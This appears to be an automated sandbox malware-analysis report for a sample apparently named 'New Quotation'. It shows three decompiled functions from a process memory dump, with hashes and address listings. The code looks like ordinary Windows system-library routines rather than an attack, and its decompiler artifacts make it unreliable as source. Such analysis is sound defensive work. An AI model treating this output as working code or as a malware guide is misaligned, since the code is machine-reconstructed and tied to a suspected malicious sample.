                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: fd6017033aa2f1d9ced49093e04e4040e25303cd6ebf6b4b38438a257d4a0d1a
                                                                                                                                                                                          • Instruction ID: 32b2818db7915b2832c166fc48449a8560304dce2d8a89d70c24c133c0e8bf76
                                                                                                                                                                                          • Opcode Fuzzy Hash: fd6017033aa2f1d9ced49093e04e4040e25303cd6ebf6b4b38438a257d4a0d1a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F818C75A0074ADFC715CF68C880BAABBF4FF48310F11866AE995D7691D730E941CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8688FB Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                          			E1D8688FB(intOrPtr __ecx, char __edx, intOrPtr _a4, intOrPtr* _a8, char* _a12) {
				char _v5;
				signed short _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed short _t75;
				intOrPtr _t81;
				intOrPtr _t89;
				signed int _t91;
				intOrPtr _t94;
				signed int _t97;
				char* _t115;
				signed short _t116;
				void* _t123;
				void* _t125;
				signed short _t128;
				signed short _t135;
				intOrPtr _t136;
				signed int _t137;
				signed char _t140;
				signed short _t143;
				intOrPtr _t145;
				signed int _t148;
				intOrPtr _t156;
				signed short _t160;
				signed int _t161;
				intOrPtr* _t164;
				intOrPtr* _t165;
				intOrPtr* _t167;
				void* _t168;
				void* _t169;
				void* _t171;

				_v5 = __edx;
				_t133 = 0;
				_v24 = __ecx;
				_t75 = 8;
				_t135 = _t75;
				_v12 = _t135;
				if(__ecx == 0) {
					 *_a12 = 0;
					 *_a8 = 0;
					L30:
					return 0;
				}
				_t164 = __ecx + 8;
				_t148 =  *(__ecx + 4) & 0x0000ffff;
				_t165 = _t164;
				_v20 = 0;
				_v28 = _t148;
				_t80 = ( *(_a4 + 1) & 0x000000ff) + 0x00000002 << 0x00000002 & 0x0000ffff;
				_v16 = ( *(_a4 + 1) & 0x000000ff) + 0x00000002 << 0x00000002 & 0x0000ffff;
				if(_t148 == 0) {
					L17:
					_t81 =  *0x1d8c5d78; // 0x0
					_t166 = _t135 & 0x0000ffff;
					_t136 = E1D7E5D90(_t135,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t81 + 0x140000, _t135 & 0x0000ffff);
					 *_a8 = _t136;
					if(_t136 != 0) {
						 *_a12 = 1;
						E1D7F7C20(_t136, _t166, 3);
						_t89 =  *_a8;
						_v20 = _t89;
						_t167 = _t89 + 8;
						_t91 =  *(_v24 + 4) & 0x0000ffff;
						_t137 = _t91;
						if(0 >= _t91) {
							L29:
							 *(_v20 + 4) = _t137;
							goto L30;
						} else {
							goto L20;
						}
						do {
							L20:
							_t94 =  *_t164;
							if(_t94 == 0 || _v5 != 0 && _t94 == 4) {
								_v28 = _t167;
								if(_t94 != 0) {
									_t97 = _t164 + (( *(_t164 + 0xd) & 0x000000ff) + 5) * 4;
								} else {
									_t44 = _t164 + 8; // 0x2008
									_t97 = _t44;
								}
								_v16 = _t97;
								 *_t167 =  *_t164;
								 *((intOrPtr*)(_t167 + 4)) =  *((intOrPtr*)(_t164 + 4));
								_t168 = _t167 + 0xc;
								E1D8188C0(_t168, _a4, 8 + ( *(_a4 + 1) & 0x000000ff) * 4);
								_t169 = _t168 + ( *(_a4 + 1) + 0x00000002 << 0x00000002 & 0x000000ff);
								E1D8188C0(_t169, _v16, 8 + ( *(_v16 + 1) & 0x000000ff) * 4);
								_t171 = _t171 + 0x18;
								_t140 =  *(_v16 + 1);
								_t167 = _t169 + (_t140 & 0x000000ff) * 4 + 8;
								_t115 = _v28;
								 *(_t115 + 2) = ( *(_a4 + 1) & 0x000000ff) + 7 + (_t140 & 0x000000ff) << 2;
								 *_t115 = 4;
								 *((short*)(_t115 + 8)) = 1;
								_t116 =  *(_t164 + 2) & 0x0000ffff;
							} else {
								E1D8188C0(_t167, _t164,  *(_t164 + 2) & 0x0000ffff);
								_t143 =  *(_t164 + 2) & 0x0000ffff;
								_t171 = _t171 + 0xc;
								_t167 = _t167 + _t143;
								_t116 = _t143;
							}
							_t133 = _t133 + 1;
							_t164 = _t164 + (_t116 & 0x0000ffff);
							_t137 =  *(_v24 + 4) & 0x0000ffff;
						} while (_t133 < _t137);
						goto L29;
					}
					return 0xc000009a;
				} else {
					goto L3;
				}
				while(1) {
					L3:
					_t156 =  *_t165;
					if(_t156 != 0) {
						goto L6;
					}
					_t123 = E1D867828(_t135, _t80,  &_v12);
					if(_t123 >= 0) {
						_t135 = _v12;
						_push( &_v12);
						_push("true");
						_pop(_t161);
						L12:
						_t123 = E1D867828(_t135, _t161);
						if(_t123 >= 0) {
							_t135 = _v12;
							L14:
							_t123 = E1D867828(_t135,  *(_t165 + 2) & 0x0000ffff,  &_v12);
							if(_t123 >= 0) {
								_t145 = _v20 + 1;
								_t165 = _t165 + ( *(_t165 + 2) & 0x0000ffff);
								_v20 = _t145;
								_t135 = _v12;
								if(_t145 >= _v28) {
									goto L17;
								}
								_t80 = _v16;
								continue;
							}
						}
					}
					L31:
					return _t123;
					L6:
					if(_v5 == _t133 || _t156 != 4) {
						goto L14;
					} else {
						_t160 = ( *(_t165 + 0xd) & 0x000000ff) << 2;
						_t125 = _t160 + 8;
						if(_t125 <= _v16) {
							_t128 = _v16 - _t160 - 8;
						} else {
							_t128 = _t125 - _v16;
						}
						_t161 = _t128 & 0x0000ffff;
						_push( &_v12);
						goto L12;
					}
					goto L31;
				}
			}




































                                                                                                                                                                                          0x1d868908
                                                                                                                                                                                          0x1d86890b
                                                                                                                                                                                          0x1d86890f
                                                                                                                                                                                          0x1d868912
                                                                                                                                                                                          0x1d868913
                                                                                                                                                                                          0x1d868916
                                                                                                                                                                                          0x1d86891c
                                                                                                                                                                                          0x1d868921
                                                                                                                                                                                          0x1d868926
                                                                                                                                                                                          0x1d868b3c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868b3c
                                                                                                                                                                                          0x1d868930
                                                                                                                                                                                          0x1d868933
                                                                                                                                                                                          0x1d868937
                                                                                                                                                                                          0x1d868939
                                                                                                                                                                                          0x1d86893c
                                                                                                                                                                                          0x1d86894b
                                                                                                                                                                                          0x1d86894e
                                                                                                                                                                                          0x1d868953
                                                                                                                                                                                          0x1d8689f4
                                                                                                                                                                                          0x1d8689f4
                                                                                                                                                                                          0x1d8689f9
                                                                                                                                                                                          0x1d868a11
                                                                                                                                                                                          0x1d868a16
                                                                                                                                                                                          0x1d868a1a
                                                                                                                                                                                          0x1d868a30
                                                                                                                                                                                          0x1d868a32
                                                                                                                                                                                          0x1d868a3c
                                                                                                                                                                                          0x1d868a3e
                                                                                                                                                                                          0x1d868a41
                                                                                                                                                                                          0x1d868a47
                                                                                                                                                                                          0x1d868a4b
                                                                                                                                                                                          0x1d868a50
                                                                                                                                                                                          0x1d868b35
                                                                                                                                                                                          0x1d868b38
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868a56
                                                                                                                                                                                          0x1d868a56
                                                                                                                                                                                          0x1d868a56
                                                                                                                                                                                          0x1d868a5a
                                                                                                                                                                                          0x1d868a82
                                                                                                                                                                                          0x1d868a87
                                                                                                                                                                                          0x1d868a95
                                                                                                                                                                                          0x1d868a89
                                                                                                                                                                                          0x1d868a89
                                                                                                                                                                                          0x1d868a89
                                                                                                                                                                                          0x1d868a89
                                                                                                                                                                                          0x1d868a9b
                                                                                                                                                                                          0x1d868aa0
                                                                                                                                                                                          0x1d868aa5
                                                                                                                                                                                          0x1d868aa8
                                                                                                                                                                                          0x1d868ab9
                                                                                                                                                                                          0x1d868acf
                                                                                                                                                                                          0x1d868adf
                                                                                                                                                                                          0x1d868ae7
                                                                                                                                                                                          0x1d868aea
                                                                                                                                                                                          0x1d868af6
                                                                                                                                                                                          0x1d868b09
                                                                                                                                                                                          0x1d868b11
                                                                                                                                                                                          0x1d868b15
                                                                                                                                                                                          0x1d868b18
                                                                                                                                                                                          0x1d868b1c
                                                                                                                                                                                          0x1d868a66
                                                                                                                                                                                          0x1d868a6d
                                                                                                                                                                                          0x1d868a72
                                                                                                                                                                                          0x1d868a76
                                                                                                                                                                                          0x1d868a79
                                                                                                                                                                                          0x1d868a7b
                                                                                                                                                                                          0x1d868a7b
                                                                                                                                                                                          0x1d868b23
                                                                                                                                                                                          0x1d868b24
                                                                                                                                                                                          0x1d868b29
                                                                                                                                                                                          0x1d868b2d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868a56
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868959
                                                                                                                                                                                          0x1d868959
                                                                                                                                                                                          0x1d868959
                                                                                                                                                                                          0x1d86895d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868965
                                                                                                                                                                                          0x1d86896c
                                                                                                                                                                                          0x1d868972
                                                                                                                                                                                          0x1d868979
                                                                                                                                                                                          0x1d86897a
                                                                                                                                                                                          0x1d86897c
                                                                                                                                                                                          0x1d8689ae
                                                                                                                                                                                          0x1d8689ae
                                                                                                                                                                                          0x1d8689b5
                                                                                                                                                                                          0x1d8689bb
                                                                                                                                                                                          0x1d8689bf
                                                                                                                                                                                          0x1d8689c9
                                                                                                                                                                                          0x1d8689d0
                                                                                                                                                                                          0x1d8689dd
                                                                                                                                                                                          0x1d8689de
                                                                                                                                                                                          0x1d8689e0
                                                                                                                                                                                          0x1d8689e6
                                                                                                                                                                                          0x1d8689ea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8689ec
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8689ec
                                                                                                                                                                                          0x1d8689d0
                                                                                                                                                                                          0x1d8689b5
                                                                                                                                                                                          0x1d868b42
                                                                                                                                                                                          0x1d868b42
                                                                                                                                                                                          0x1d86897f
                                                                                                                                                                                          0x1d868982
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868989
                                                                                                                                                                                          0x1d86898d
                                                                                                                                                                                          0x1d868991
                                                                                                                                                                                          0x1d868998
                                                                                                                                                                                          0x1d8689a4
                                                                                                                                                                                          0x1d86899a
                                                                                                                                                                                          0x1d86899a
                                                                                                                                                                                          0x1d86899a
                                                                                                                                                                                          0x1d8689a7
                                                                                                                                                                                          0x1d8689ad
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8689ad
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868982

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d1850b10200d5388bbee9fbdf880a48a4d0261a1b8d7b44eee62886a89772520
                                                                                                                                                                                          • Instruction ID: c044666d148c44fcb580e8fd6209c49df8b05102e64549aaf8e8238cc66c81fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: d1850b10200d5388bbee9fbdf880a48a4d0261a1b8d7b44eee62886a89772520
                                                                                                                                                                                          • Instruction Fuzzy Hash: DE71CFB491425AAFCB01CF59C440ABABBF1FF45311B058069F998DB355E338EA46C7B2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D84FFDC Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                          			E1D84FFDC(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				unsigned int _t150;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = E1D7E5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E1D84FD65(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E1D7E3C40();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E1D812F90();
					_t87 = E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_push("true");
						_pop(_t157);
						_t87 = E1D850DCB( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E1D850DCB( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E1D850DCB( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E1D850DCB( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = E1D7E5D90( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E1D84FD65( &_v36, _t177, 0xc78,  &_v8);
								_t150 = _v8;
								_t178 = _t177 + (_t150 >> 1) * 2;
								_v12 = _t150 + 4;
								E1D84FD65( &_v44, _t177 + (_t150 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E1D84FD65( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E1D84FD65( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _t150 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E1D7E3C40() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E1D812F90();
								E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = E1D7E3B90( &_v36);
							if(_v24 >= 0) {
								_t87 = E1D7E3B90( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = E1D7E3B90( &_v52);
							}
							if(_v28 >= 0) {
								return E1D7E3B90( &_v60);
							}
						}
					}
				}
				return _t87;
			}
































                                                                                                                                                                                          0x1d84ffe7
                                                                                                                                                                                          0x1d84fff1
                                                                                                                                                                                          0x1d84fff4
                                                                                                                                                                                          0x1d84fff6
                                                                                                                                                                                          0x1d84fff9
                                                                                                                                                                                          0x1d84fffc
                                                                                                                                                                                          0x1d84ffff
                                                                                                                                                                                          0x1d850002
                                                                                                                                                                                          0x1d850005
                                                                                                                                                                                          0x1d850008
                                                                                                                                                                                          0x1d850011
                                                                                                                                                                                          0x1d850017
                                                                                                                                                                                          0x1d85001c
                                                                                                                                                                                          0x1d850020
                                                                                                                                                                                          0x1d85002b
                                                                                                                                                                                          0x1d85002e
                                                                                                                                                                                          0x1d850035
                                                                                                                                                                                          0x1d850040
                                                                                                                                                                                          0x1d850043
                                                                                                                                                                                          0x1d850049
                                                                                                                                                                                          0x1d850055
                                                                                                                                                                                          0x1d850060
                                                                                                                                                                                          0x1d850063
                                                                                                                                                                                          0x1d850068
                                                                                                                                                                                          0x1d85006f
                                                                                                                                                                                          0x1d850081
                                                                                                                                                                                          0x1d850071
                                                                                                                                                                                          0x1d85007a
                                                                                                                                                                                          0x1d85007a
                                                                                                                                                                                          0x1d850086
                                                                                                                                                                                          0x1d850087
                                                                                                                                                                                          0x1d85008a
                                                                                                                                                                                          0x1d85008f
                                                                                                                                                                                          0x1d850090
                                                                                                                                                                                          0x1d8500a1
                                                                                                                                                                                          0x1d8500a6
                                                                                                                                                                                          0x1d8500af
                                                                                                                                                                                          0x1d8500bb
                                                                                                                                                                                          0x1d8500bc
                                                                                                                                                                                          0x1d8500be
                                                                                                                                                                                          0x1d8500bf
                                                                                                                                                                                          0x1d8500c6
                                                                                                                                                                                          0x1d8500e0
                                                                                                                                                                                          0x1d8500ef
                                                                                                                                                                                          0x1d8500f5
                                                                                                                                                                                          0x1d8500f8
                                                                                                                                                                                          0x1d850105
                                                                                                                                                                                          0x1d85010e
                                                                                                                                                                                          0x1d850114
                                                                                                                                                                                          0x1d850119
                                                                                                                                                                                          0x1d85011e
                                                                                                                                                                                          0x1d850124
                                                                                                                                                                                          0x1d85012d
                                                                                                                                                                                          0x1d850135
                                                                                                                                                                                          0x1d850139
                                                                                                                                                                                          0x1d850139
                                                                                                                                                                                          0x1d850146
                                                                                                                                                                                          0x1d85014b
                                                                                                                                                                                          0x1d850157
                                                                                                                                                                                          0x1d85015a
                                                                                                                                                                                          0x1d850167
                                                                                                                                                                                          0x1d850178
                                                                                                                                                                                          0x1d85018a
                                                                                                                                                                                          0x1d85018f
                                                                                                                                                                                          0x1d850195
                                                                                                                                                                                          0x1d8501a4
                                                                                                                                                                                          0x1d8501ac
                                                                                                                                                                                          0x1d8501b6
                                                                                                                                                                                          0x1d8501c1
                                                                                                                                                                                          0x1d8501c1
                                                                                                                                                                                          0x1d8501cd
                                                                                                                                                                                          0x1d8501ce
                                                                                                                                                                                          0x1d8501cf
                                                                                                                                                                                          0x1d8501d4
                                                                                                                                                                                          0x1d8501d5
                                                                                                                                                                                          0x1d8501e6
                                                                                                                                                                                          0x1d8501eb
                                                                                                                                                                                          0x1d8501eb
                                                                                                                                                                                          0x1d8501f2
                                                                                                                                                                                          0x1d8501fb
                                                                                                                                                                                          0x1d850201
                                                                                                                                                                                          0x1d850201
                                                                                                                                                                                          0x1d850208
                                                                                                                                                                                          0x1d85020e
                                                                                                                                                                                          0x1d85020e
                                                                                                                                                                                          0x1d850217
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85021d
                                                                                                                                                                                          0x1d850217
                                                                                                                                                                                          0x1d8500c6
                                                                                                                                                                                          0x1d8500af
                                                                                                                                                                                          0x1d850226

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 4dbc9b8f6ca34978a445ea77d035b2b09001d3566f33c20ef046d4ce11677101
                                                                                                                                                                                          • Instruction ID: 63ee8513fa6ff1d7dd3e2619983560b98eed2c688e0bbe8cc9d567069d4ce225
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dbc9b8f6ca34978a445ea77d035b2b09001d3566f33c20ef046d4ce11677101
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82718C75E00619EFDB10CFA8C984BAEBBB8FF48710F114569E605A7250DB30EA41CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D865E30 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 36%
                                                                                                                                                                                          			E1D865E30(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) == 0) {
					if((_t106 & 0x00000002) != 0) {
						_t106 = _t106 | 0x00000001;
					}
					_t109 =  *0x1d8c5d78; // 0x0
					_t124 = E1D7E5D90(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
					if(_t124 != 0) {
						 *_t124 =  *_t124 & 0x00000000;
						_t124[1] = _t124[1] & 0x00000000;
						_t124[4] = _t124[4] & 0x00000000;
						if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
							L13:
							_push(_t124);
							if((_t106 & 0x00000002) != 0) {
								_push(0x200);
								_push(0x28);
								_push(0xffffffff);
								_t122 = E1D812CB0();
								if(_t122 < 0) {
									L33:
									if((_t124[4] & 0x00000001) != 0) {
										_push("true");
										_t107 =  &(_t124[1]);
										_push(_t107);
										_push(5);
										_push(0xfffffffe);
										E1D812A60();
										if( *_t107 != 0) {
											_push( *_t107);
											E1D812A80();
										}
									}
									_push(_t124);
									_push(0);
									_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
									L37:
									E1D7E3BC0();
									return _t122;
								}
								_t124[4] = _t124[4] | 0x00000002;
								L18:
								_t108 = _a8;
								_t29 =  &(_t124[0x105]); // 0x414
								_t80 = _t29;
								_t124[3] = _t80;
								_t123 = 0;
								_t124[2] =  &(_t124[5]);
								 *_t80 = _t108;
								if(_t108 == 0) {
									L21:
									_t112 = 0x400;
									_push( &_v8);
									_v8 = 0x400;
									_push(_t124[2]);
									_push(0x400);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E1D812DC0();
									if(_t122 != 0xc0000023) {
										L26:
										if(_t122 != 0x106) {
											L40:
											if(_t122 < 0) {
												L29:
												_t83 = _t124[2];
												if(_t83 != 0 && _t83 !=  &(_t124[5])) {
													E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
												_push( *_t124);
												E1D812A80();
												goto L33;
											}
											 *_a16 = _t124;
											return 0;
										}
										if(_t108 != 1) {
											_t122 = 0;
											goto L40;
										}
										_t122 = 0xc0000061;
										goto L29;
									} else {
										goto L22;
									}
									while(1) {
										L22:
										_t89 =  *0x1d8c5d78; // 0x0
										_t92 = E1D7E5D90(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
										_t124[2] = _t92;
										if(_t92 == 0) {
											break;
										}
										_t112 =  &_v8;
										_push( &_v8);
										_push(_t92);
										_push(_v8);
										_push(_t124[3]);
										_push(0);
										_push( *_t124);
										_t122 = E1D812DC0();
										if(_t122 != 0xc0000023) {
											goto L26;
										}
										E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
									}
									_t122 = 0xc0000017;
									goto L26;
								}
								_t119 = 0;
								do {
									_t114 = _t124[3];
									_t119 = _t119 + 0xc;
									 *((intOrPtr*)(_t119 + _t114 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
									 *(_t119 + _t114 - 4) =  *(_t119 + _t114 - 4) & 0x00000000;
									_t123 = _t123 + 1;
									 *((intOrPtr*)(_t119 + _t124[3])) = 2;
								} while (_t123 < _t108);
								goto L21;
							}
							_push(0x28);
							_push(3);
							_t122 = E1D80BFA0();
							if(_t122 < 0) {
								goto L33;
							}
							_t124[4] = _t124[4] | 0x00000001;
							goto L18;
						}
						if((_t106 & 0x00000001) == 0) {
							_t115 = 0x28;
							_t122 = E1D86934D(_t115, _t124);
							if(_t122 < 0) {
								L9:
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								goto L37;
							}
							L12:
							if( *_t124 != 0) {
								goto L18;
							}
							goto L13;
						}
						_push("true");
						_pop(_t117);
						_t122 = E1D86934D(_t117,  &(_t124[1]));
						if(_t122 >= 0) {
							_t124[4] = _t124[4] | 0x00000001;
							_v12 = _v12 & 0x00000000;
							_push("true");
							_push( &_v12);
							_push(5);
							_push(0xfffffffe);
							E1D812A60();
							goto L12;
						}
						goto L9;
					} else {
						return 0xc0000017;
					}
				}
				return 0xc000000d;
			}




















                                                                                                                                                                                          0x1d865e39
                                                                                                                                                                                          0x1d865e44
                                                                                                                                                                                          0x1d865e53
                                                                                                                                                                                          0x1d865e55
                                                                                                                                                                                          0x1d865e55
                                                                                                                                                                                          0x1d865e58
                                                                                                                                                                                          0x1d865e80
                                                                                                                                                                                          0x1d865e84
                                                                                                                                                                                          0x1d865e96
                                                                                                                                                                                          0x1d865e99
                                                                                                                                                                                          0x1d865e9d
                                                                                                                                                                                          0x1d865ea8
                                                                                                                                                                                          0x1d865f00
                                                                                                                                                                                          0x1d865f00
                                                                                                                                                                                          0x1d865f04
                                                                                                                                                                                          0x1d865f1f
                                                                                                                                                                                          0x1d865f24
                                                                                                                                                                                          0x1d865f26
                                                                                                                                                                                          0x1d865f2d
                                                                                                                                                                                          0x1d865f31
                                                                                                                                                                                          0x1d866034
                                                                                                                                                                                          0x1d866038
                                                                                                                                                                                          0x1d86603a
                                                                                                                                                                                          0x1d86603c
                                                                                                                                                                                          0x1d86603f
                                                                                                                                                                                          0x1d866040
                                                                                                                                                                                          0x1d866042
                                                                                                                                                                                          0x1d866044
                                                                                                                                                                                          0x1d86604c
                                                                                                                                                                                          0x1d86604e
                                                                                                                                                                                          0x1d866050
                                                                                                                                                                                          0x1d866050
                                                                                                                                                                                          0x1d86604c
                                                                                                                                                                                          0x1d86605b
                                                                                                                                                                                          0x1d86605c
                                                                                                                                                                                          0x1d86605e
                                                                                                                                                                                          0x1d866061
                                                                                                                                                                                          0x1d866061
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d866066
                                                                                                                                                                                          0x1d865f37
                                                                                                                                                                                          0x1d865f3b
                                                                                                                                                                                          0x1d865f3b
                                                                                                                                                                                          0x1d865f3e
                                                                                                                                                                                          0x1d865f3e
                                                                                                                                                                                          0x1d865f47
                                                                                                                                                                                          0x1d865f4a
                                                                                                                                                                                          0x1d865f4c
                                                                                                                                                                                          0x1d865f4f
                                                                                                                                                                                          0x1d865f53
                                                                                                                                                                                          0x1d865f7b
                                                                                                                                                                                          0x1d865f7b
                                                                                                                                                                                          0x1d865f83
                                                                                                                                                                                          0x1d865f84
                                                                                                                                                                                          0x1d865f87
                                                                                                                                                                                          0x1d865f8a
                                                                                                                                                                                          0x1d865f8b
                                                                                                                                                                                          0x1d865f8e
                                                                                                                                                                                          0x1d865f90
                                                                                                                                                                                          0x1d865f97
                                                                                                                                                                                          0x1d865f9f
                                                                                                                                                                                          0x1d865ffc
                                                                                                                                                                                          0x1d866002
                                                                                                                                                                                          0x1d866071
                                                                                                                                                                                          0x1d866073
                                                                                                                                                                                          0x1d86600e
                                                                                                                                                                                          0x1d86600e
                                                                                                                                                                                          0x1d866013
                                                                                                                                                                                          0x1d866028
                                                                                                                                                                                          0x1d866028
                                                                                                                                                                                          0x1d86602d
                                                                                                                                                                                          0x1d86602f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d86602f
                                                                                                                                                                                          0x1d866078
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d86607a
                                                                                                                                                                                          0x1d866007
                                                                                                                                                                                          0x1d86606f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d86606f
                                                                                                                                                                                          0x1d866009
